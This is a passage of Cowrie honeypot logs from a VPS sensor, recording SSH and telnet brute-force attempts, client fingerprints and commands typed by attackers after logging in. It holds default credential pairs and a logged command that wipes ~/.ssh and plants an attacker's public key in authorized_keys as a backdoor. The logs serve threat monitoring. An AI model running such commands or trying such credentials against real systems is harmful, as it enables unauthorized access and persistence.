-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:19:18.668144Z","src_ip":"212.227.125.160","session":"000b3c01d69d"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-28T06:19:19.331027Z","src_ip":"212.227.125.160","session":"000b3c01d69d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:20.558947Z","src_ip":"212.227.125.160","session":"000b3c01d69d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47783,"dst_ip":"1.2.3.4","dst_port":23,"session":"080af1746372","protocol":"telnet","message":"New connection: 212.227.235.229:47783 (1.2.3.4:23) [session: 080af1746372]","sensor":"my-vps","timestamp":"2025-08-28T06:19:21.473204Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55304,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3033c1173a0","protocol":"ssh","message":"New connection: 212.227.235.229:55304 (1.2.3.4:22) [session: f3033c1173a0]","sensor":"my-vps","timestamp":"2025-08-28T06:19:25.030574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:19:25.031552Z","src_ip":"212.227.235.229","session":"f3033c1173a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:19:25.294159Z","src_ip":"212.227.235.229","session":"f3033c1173a0"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-28T06:19:26.348707Z","src_ip":"212.227.235.229","session":"f3033c1173a0"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:27.614976Z","src_ip":"212.227.235.229","session":"f3033c1173a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46396,"dst_ip":"1.2.3.4","dst_port":22,"session":"e71505cf737a","protocol":"ssh","message":"New connection: 212.227.125.160:46396 (1.2.3.4:22) [session: e71505cf737a]","sensor":"my-vps","timestamp":"2025-08-28T06:19:34.576046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:19:34.583011Z","src_ip":"212.227.125.160","session":"e71505cf737a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:19:34.794979Z","src_ip":"212.227.125.160","session":"e71505cf737a"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:19:35.658456Z","src_ip":"212.227.125.160","session":"e71505cf737a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:36.876311Z","src_ip":"212.227.125.160","session":"e71505cf737a"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":53512,"dst_ip":"1.2.3.4","dst_port":23,"session":"8cabe8eaf348","protocol":"telnet","message":"New connection: 8.222.212.69:53512 (1.2.3.4:23) [session: 8cabe8eaf348]","sensor":"my-vps","timestamp":"2025-08-28T06:19:38.370909Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40024,"dst_ip":"1.2.3.4","dst_port":22,"session":"09492a29db27","protocol":"ssh","message":"New connection: 212.227.235.229:40024 (1.2.3.4:22) [session: 09492a29db27]","sensor":"my-vps","timestamp":"2025-08-28T06:19:41.068987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:19:41.069909Z","src_ip":"212.227.235.229","session":"09492a29db27"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:19:41.326230Z","src_ip":"212.227.235.229","session":"09492a29db27"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:19:42.094977Z","src_ip":"212.227.235.229","session":"09492a29db27"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:43.359429Z","src_ip":"212.227.235.229","session":"09492a29db27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54692,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb77f4b03212","protocol":"ssh","message":"New connection: 212.227.125.160:54692 (1.2.3.4:22) [session: fb77f4b03212]","sensor":"my-vps","timestamp":"2025-08-28T06:19:51.155590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:19:51.156530Z","src_ip":"212.227.125.160","session":"fb77f4b03212"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:19:51.372829Z","src_ip":"212.227.125.160","session":"fb77f4b03212"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:19:52.026872Z","src_ip":"212.227.125.160","session":"fb77f4b03212"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:19:52.529679Z","src_ip":"212.227.125.160","session":"fb77f4b03212"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:19:52.530365Z","src_ip":"212.227.125.160","session":"fb77f4b03212"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:52.750921Z","src_ip":"212.227.125.160","session":"fb77f4b03212"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:52.752258Z","src_ip":"212.227.125.160","session":"fb77f4b03212"}
{"eventid":"cowrie.session.closed","duration":31.347673177719116,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:52.820019Z","src_ip":"212.227.235.229","session":"080af1746372"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41970,"dst_ip":"1.2.3.4","dst_port":22,"session":"f76966b8c885","protocol":"ssh","message":"New connection: 212.227.235.229:41970 (1.2.3.4:22) [session: f76966b8c885]","sensor":"my-vps","timestamp":"2025-08-28T06:19:57.743187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:19:57.743843Z","src_ip":"212.227.235.229","session":"f76966b8c885"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:19:57.992955Z","src_ip":"212.227.235.229","session":"f76966b8c885"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:19:58.741359Z","src_ip":"212.227.235.229","session":"f76966b8c885"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":43840,"dst_ip":"1.2.3.4","dst_port":23,"session":"6bf3b84b1d9b","protocol":"telnet","message":"New connection: 8.222.212.69:43840 (1.2.3.4:23) [session: 6bf3b84b1d9b]","sensor":"my-vps","timestamp":"2025-08-28T06:19:58.943233Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:19:59.496608Z","src_ip":"212.227.235.229","session":"f76966b8c885"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:19:59.497288Z","src_ip":"212.227.235.229","session":"f76966b8c885"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:59.751945Z","src_ip":"212.227.235.229","session":"f76966b8c885"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:59.753333Z","src_ip":"212.227.235.229","session":"f76966b8c885"}
{"eventid":"cowrie.session.connect","src_ip":"172.174.5.146","src_port":56978,"dst_ip":"1.2.3.4","dst_port":22,"session":"a240dc211e85","protocol":"ssh","message":"New connection: 172.174.5.146:56978 (1.2.3.4:22) [session: a240dc211e85]","sensor":"my-vps","timestamp":"2025-08-28T06:20:01.760089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:20:01.761068Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:20:01.872371Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.login.success","username":"root","password":"aiculedssul","message":"login attempt [root/aiculedssul] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:20:02.365008Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:20:02.607542Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:20:02.608250Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:20:02.609684Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:02.721972Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:20:03.077744Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:20:03.078509Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:20:03.200784Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:03.201703Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.session.connect","src_ip":"172.174.5.146","src_port":57157,"dst_ip":"1.2.3.4","dst_port":22,"session":"1845c780eff0","protocol":"ssh","message":"New connection: 172.174.5.146:57157 (1.2.3.4:22) [session: 1845c780eff0]","sensor":"my-vps","timestamp":"2025-08-28T06:20:03.310702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:20:03.311544Z","src_ip":"172.174.5.146","session":"1845c780eff0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:20:03.421913Z","src_ip":"172.174.5.146","session":"1845c780eff0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:20:03.903691Z","src_ip":"172.174.5.146","session":"1845c780eff0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:05.016305Z","src_ip":"172.174.5.146","session":"1845c780eff0"}
{"eventid":"cowrie.session.connect","src_ip":"172.174.5.146","src_port":57362,"dst_ip":"1.2.3.4","dst_port":22,"session":"da0051526cb4","protocol":"ssh","message":"New connection: 172.174.5.146:57362 (1.2.3.4:22) [session: da0051526cb4]","sensor":"my-vps","timestamp":"2025-08-28T06:20:05.126019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:20:05.127076Z","src_ip":"172.174.5.146","session":"da0051526cb4"}
